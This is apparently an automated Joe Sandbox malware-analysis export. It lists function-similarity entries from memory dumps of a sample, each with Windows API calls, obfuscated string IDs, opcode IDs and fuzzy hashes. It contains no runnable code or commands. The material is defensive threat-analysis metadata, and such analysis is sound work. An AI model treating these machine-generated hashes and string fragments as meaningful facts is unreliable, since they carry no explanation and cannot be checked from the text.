                                                                                                                                      • API ID:
                                                                                                                                      • String ID: !2:*$)$-$5878$EFp%$FF$PP-*$}
                                                                                                                                      • API String ID: 0-1482250269
                                                                                                                                      • Opcode ID: d49ed610e2b5b9f2afb54b676f85b3de2ed6ffd0ff0e1b417e923b3fb4b91375
                                                                                                                                      • Instruction ID: f842d88070908a0c2b91e88b63a8716b86fd09cb58c436fb7820147cd6a17efc
                                                                                                                                      • Opcode Fuzzy Hash: d49ed610e2b5b9f2afb54b676f85b3de2ed6ffd0ff0e1b417e923b3fb4b91375
                                                                                                                                      • Instruction Fuzzy Hash: 8752287550C3908FC725CF24C891A6FBBE2AFD6304F18866DE8D59B392E7399805CB52
                                                                                                                                      APIs
                                                                                                                                      • LoadLibraryExW.KERNEL32(9F2D9D29,00000000,00000800), ref: 007BD6AC
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                      • String ID: 7$8$EmQu$OZlk$pq
                                                                                                                                      • API String ID: 1029625771-859822191
                                                                                                                                      • Opcode ID: 1a0a9ba5fa6ccf1d8ba5c1e08973c55cad240f927b34ddbbb08728781530c4b0
                                                                                                                                      • Instruction ID: 45ba500a3f91d70c1491f1e47411cfdf0515ec720239187d5d9d18ac9ad1acdf
                                                                                                                                      • Opcode Fuzzy Hash: 1a0a9ba5fa6ccf1d8ba5c1e08973c55cad240f927b34ddbbb08728781530c4b0
                                                                                                                                      • Instruction Fuzzy Hash: 5481F77060C3D18BE3388B3984617EBBBD19F93314F28896DD4D98B392EA7D5809C752
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 7$8$EmQu$OZlk$pq
                                                                                                                                      • API String ID: 0-859822191
                                                                                                                                      • Opcode ID: 8802dc920b77d13982c00e3c54bbde0ac025416e49ddf1288280c2184b7df96f
                                                                                                                                      • Instruction ID: 45b602afe8d89cfa397e4ba2f329b92e0d54a4ef55a71152f3c1e4e3ec3d9eaf
                                                                                                                                      • Opcode Fuzzy Hash: 8802dc920b77d13982c00e3c54bbde0ac025416e49ddf1288280c2184b7df96f
                                                                                                                                      • Instruction Fuzzy Hash: 6381E77060C3D18BE3398B3984617EBBBD19F93314F18896DD4D98B392EA7D5809C752
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 7$8$EmQu$OZlk$pq
                                                                                                                                      • API String ID: 0-859822191
                                                                                                                                      • Opcode ID: ec4bb49bb568de66e215ebe4feddd760154d11a0b2caa77608cfa43b06ea23ec
                                                                                                                                      • Instruction ID: 2ec02cfbfedb7c3c76197b4c55d4fdd7ba3f31f0edaa95cb8cae286b1cc4474a
                                                                                                                                      • Opcode Fuzzy Hash: ec4bb49bb568de66e215ebe4feddd760154d11a0b2caa77608cfa43b06ea23ec
                                                                                                                                      • Instruction Fuzzy Hash: 5281F77060C3D18BE3388B3984617EBBBD19F93314F18896DD4D98B392DA7D5809C752
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: "-03$Dk$HJ@[$[c[X$`a$gfff$3)K
                                                                                                                                      • API String ID: 0-1220033372
                                                                                                                                      • Opcode ID: 413b7b421077724935996499f46e1a5d174ae673626e65839c322b57a58b7984
                                                                                                                                      • Instruction ID: 45345bbbfce232e15c3691a92139579b2dbe1db88e5b4757c573d1c25ef8d861
                                                                                                                                      • Opcode Fuzzy Hash: 413b7b421077724935996499f46e1a5d174ae673626e65839c322b57a58b7984
                                                                                                                                      • Instruction Fuzzy Hash: B21213B19083459FC724DF24D8827ABB7F1AF91300F458A2DF5E68B252E778D905CB86
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: bcd$-R*T$-^/P$6V6h$E*$n
                                                                                                                                      • API String ID: 0-1706003273
                                                                                                                                      • Opcode ID: 753ed4f0248689dd5dfe6cbd477edb4580a631bbf04379a2b3d2cd50b6281eec
                                                                                                                                      • Instruction ID: 5df5a7c569fc964a3034fee63c21346f332c51d4ccc7e4c9cfe7f1336709aa50
                                                                                                                                      • Opcode Fuzzy Hash: 753ed4f0248689dd5dfe6cbd477edb4580a631bbf04379a2b3d2cd50b6281eec
                                                                                                                                      • Instruction Fuzzy Hash: DA423B76A09311CBC324CF29C89176BB7F2EFD9360F098A2DE8C55B251EB389941C752
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: g*i$ !$>O$AQ$^]$C*E
                                                                                                                                      • API String ID: 0-4223914267
                                                                                                                                      • Opcode ID: 357d966865d5464e4f23a7c1e0c8f01dad8ec3ba28bbff74a5593fc41e9a024e
                                                                                                                                      • Instruction ID: b8cafc63540388b773369f5c7e9682e28c88cfafeff31908b8c62e0c8a136260
                                                                                                                                      • Opcode Fuzzy Hash: 357d966865d5464e4f23a7c1e0c8f01dad8ec3ba28bbff74a5593fc41e9a024e
                                                                                                                                      • Instruction Fuzzy Hash: 3F0237B2609350CBC7348F28D8957ABB3A1FFC2314F19872DE4899B391E7388901C792
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: S<$UNC$UNC$UNC$UNC$UNC
                                                                                                                                      • API String ID: 0-1749435030
                                                                                                                                      • Opcode ID: 39b126f6b6259f9c32e064cee3751f987941be3460d805d258490f4f4f54ecbd
                                                                                                                                      • Instruction ID: acd341c3289bc748964bac40d6cd30f026ef81cd3e962f8c9a421cf8428b5c6d
                                                                                                                                      • Opcode Fuzzy Hash: 39b126f6b6259f9c32e064cee3751f987941be3460d805d258490f4f4f54ecbd
                                                                                                                                      • Instruction Fuzzy Hash: B4F101216087D08ED326CA3C8858B497FE26B66324F0E82DDD4AA9F3E3C6798945C751
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 'KM$6W5Y$D$^_$CE$GI
                                                                                                                                      • API String ID: 0-60676486
                                                                                                                                      • Opcode ID: b6c4a1564cd3641fe3d7654cf52ad8dc6c289961a20af413583e6bac79db39cc
                                                                                                                                      • Instruction ID: 7659b3c373e228f2e0a5eb42ed3be17223b90412071d76b1da219f16308be84a
                                                                                                                                      • Opcode Fuzzy Hash: b6c4a1564cd3641fe3d7654cf52ad8dc6c289961a20af413583e6bac79db39cc
                                                                                                                                      • Instruction Fuzzy Hash: 8DA19CB1508341CFD324CF24C8A1B6BBBF1FF86314F098A5CE4895B2A1E3789945CB96
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: &9,$*9,$:SB@$:SB@$B
                                                                                                                                      • API String ID: 0-1739858663
                                                                                                                                      • Opcode ID: 2c94a60e91332a60c16f752d161838455e759f9907e89584a833d818f60fb937
                                                                                                                                      • Instruction ID: b071b4e3aac7f50ee3ea74656039e4b8705c14bceb6c186a119e55502766c218
                                                                                                                                      • Opcode Fuzzy Hash: 2c94a60e91332a60c16f752d161838455e759f9907e89584a833d818f60fb937
                                                                                                                                      • Instruction Fuzzy Hash: D1C139712093419FD728CF28D491BBB77E2EFC6314F18866DE6CA87292DB389851C712
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID: $""$Z01#$txvW$FxH
                                                                                                                                      • API String ID: 2994545307-221174876
                                                                                                                                      • Opcode ID: 8f825f0e5b68a459a3d94839e4b68fbc465eb759d941a5a7f172114c891fda02
                                                                                                                                      • Instruction ID: aa95ca2d95a066030290bfdd54afccf6a5788b51c25d38d9516ece7b3f93534a
                                                                                                                                      • Opcode Fuzzy Hash: 8f825f0e5b68a459a3d94839e4b68fbc465eb759d941a5a7f172114c891fda02
                                                                                                                                      • Instruction Fuzzy Hash: 22428D72A093519FC728CF28DC91A7BB7E2BBC6310F19472DD5C697252DA399C01CB92
                                                                                                                                      APIs
                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00B1D480,00B4F190), ref: 00B1D355
                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(00B1D480,?,00B1D480,00B4F190), ref: 00B1D35F
                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409,?,00B1D480,00B4F190), ref: 00B1D36A
                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,00B1D480,00B4F190), ref: 00B1D371
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3980260114.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3980242174.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980528943.0000000000B4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980554968.0000000000B5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980574224.0000000000B61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980631709.0000000000B63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_910000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3231755760-0
                                                                                                                                      • Opcode ID: 1b8f84fef32e4bfd092818efb4e58f07e13872b2a8a2ca19d1cc840ad72393f4
                                                                                                                                      • Instruction ID: e70d5d7e9233d8f4648100429e4de5b4aee9c76baaa351d3bebdae76ad117ac7
                                                                                                                                      • Opcode Fuzzy Hash: 1b8f84fef32e4bfd092818efb4e58f07e13872b2a8a2ca19d1cc840ad72393f4
                                                                                                                                      • Instruction Fuzzy Hash: 22D0C979400205ABC7102FE0FE0CA793B6CBB8A212F004420F709C3222CE3296009B72
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3980260114.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3980242174.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980528943.0000000000B4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980554968.0000000000B5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980574224.0000000000B61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980631709.0000000000B63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_910000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 1i$Lhst$l$wj
                                                                                                                                      • API String ID: 0-1476473179
                                                                                                                                      • Opcode ID: 6d6d3ad956b40677a93ce6116d565a081119ec6ed4416cb6dc13aabd8ff5047f
                                                                                                                                      • Instruction ID: ee0079e352bd10dcd6155d149309c67b74645c986147ea4a4322908fceaf122c
                                                                                                                                      • Opcode Fuzzy Hash: 6d6d3ad956b40677a93ce6116d565a081119ec6ed4416cb6dc13aabd8ff5047f
                                                                                                                                      • Instruction Fuzzy Hash: D3525971E0025A8FCB04DFA9E9916FDBBF4FB18311F1441ABE484EB390DA789945DB60
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: H\$Mt$PW
                                                                                                                                      • API String ID: 0-704480219
                                                                                                                                      • Opcode ID: b1216be805493c30d3c15020b07e1298f27eeccc7400e165dbc8bc79ffedf936
                                                                                                                                      • Instruction ID: 501a563311a8b8c04e5df4bc3f1dac2eab3f10e14348d824e1650adfca9e6e7d
                                                                                                                                      • Opcode Fuzzy Hash: b1216be805493c30d3c15020b07e1298f27eeccc7400e165dbc8bc79ffedf936
                                                                                                                                      • Instruction Fuzzy Hash: 86E1447260C3408FD720CF68D8817ABBBE1EB85314F14892DF6959B391D778D909DB82
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: >UVW$cv$cv
                                                                                                                                      • API String ID: 0-1004160449
                                                                                                                                      • Opcode ID: 01b4b9bc5355421682e303705620f9cae2caf06abe882c8c0d4d0ceb11af369b
                                                                                                                                      • Instruction ID: 9cd81555bfed2276b8c7f3e3f99b30c251f44b908f9af7bca7c50e409cfd88ce
                                                                                                                                      • Opcode Fuzzy Hash: 01b4b9bc5355421682e303705620f9cae2caf06abe882c8c0d4d0ceb11af369b
                                                                                                                                      • Instruction Fuzzy Hash: 92C1E2702183408BD724DF24C8617ABB7F1FFD2394F959A5CE5958B3A5E7399800CB52
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 7$gfff$mn
                                                                                                                                      • API String ID: 0-217831054
                                                                                                                                      • Opcode ID: cb0363a066751d8d25a45c1a19039c360cfac6f8dc70094fd902497e2adcd226
                                                                                                                                      • Instruction ID: 8fa50367ef8b7f99b02f3a6adfa072e20bd87b791ec1591579a10c049f491ba0
                                                                                                                                      • Opcode Fuzzy Hash: cb0363a066751d8d25a45c1a19039c360cfac6f8dc70094fd902497e2adcd226
                                                                                                                                      • Instruction Fuzzy Hash: 6F714D72A182514BD318CF29CC5176B77E6EBC5324F19C72DE495CB395EA389806CBC1
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 0$8
                                                                                                                                      • API String ID: 0-46163386
                                                                                                                                      • Opcode ID: 0795940c364409686aa142fd17365f6110d1d53ca7bfd200d1a600bbbeda2692
                                                                                                                                      • Instruction ID: 9885d4e23ef72910fcde2c2792a9be40bf75efdf2a78dc567d3aa7cdf4a64ce6
                                                                                                                                      • Opcode Fuzzy Hash: 0795940c364409686aa142fd17365f6110d1d53ca7bfd200d1a600bbbeda2692
                                                                                                                                      • Instruction Fuzzy Hash: 7C726A716083409FDB25CF18D854BAFBBE2AF88314F48891DF98987392D379D945CB92
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID: ^_AA$f
                                                                                                                                      • API String ID: 2994545307-986475866
                                                                                                                                      • Opcode ID: 6ad4edb5555390d65fae086568cc321f204098435da2e4b53c9b39ef2172a4a1
                                                                                                                                      • Instruction ID: b11acd1b3eeaa0f72ee947b7b527b5552e96bc1e730198af41cfa6fe47adc719
                                                                                                                                      • Opcode Fuzzy Hash: 6ad4edb5555390d65fae086568cc321f204098435da2e4b53c9b39ef2172a4a1
                                                                                                                                      • Instruction Fuzzy Hash: 1E22F675608355ABC714CF28C890B2FBBE2ABD8319F19C62DE4D697291D634DC05CB82
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: =N00$=N00
                                                                                                                                      • API String ID: 0-484593190
                                                                                                                                      • Opcode ID: 95d967e5097fc279e5bfacd51aea094c31061b857bfe235255af9ea565f6946e
                                                                                                                                      • Instruction ID: 88fa07a8f190db43a75a620633bdb020d910cbea88b934e38c9a68a9e3145649
                                                                                                                                      • Opcode Fuzzy Hash: 95d967e5097fc279e5bfacd51aea094c31061b857bfe235255af9ea565f6946e
                                                                                                                                      • Instruction Fuzzy Hash: 4012ED36619211CFC704CF28E89066AB7F2FBC9314F1AC8BED98A97255D739E841CB41
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: =N00$=N00
                                                                                                                                      • API String ID: 0-484593190
                                                                                                                                      • Opcode ID: 414d4c8a70f0d8191e438d5764acc7a52503a826a9e4512ea37fff4403225e5a
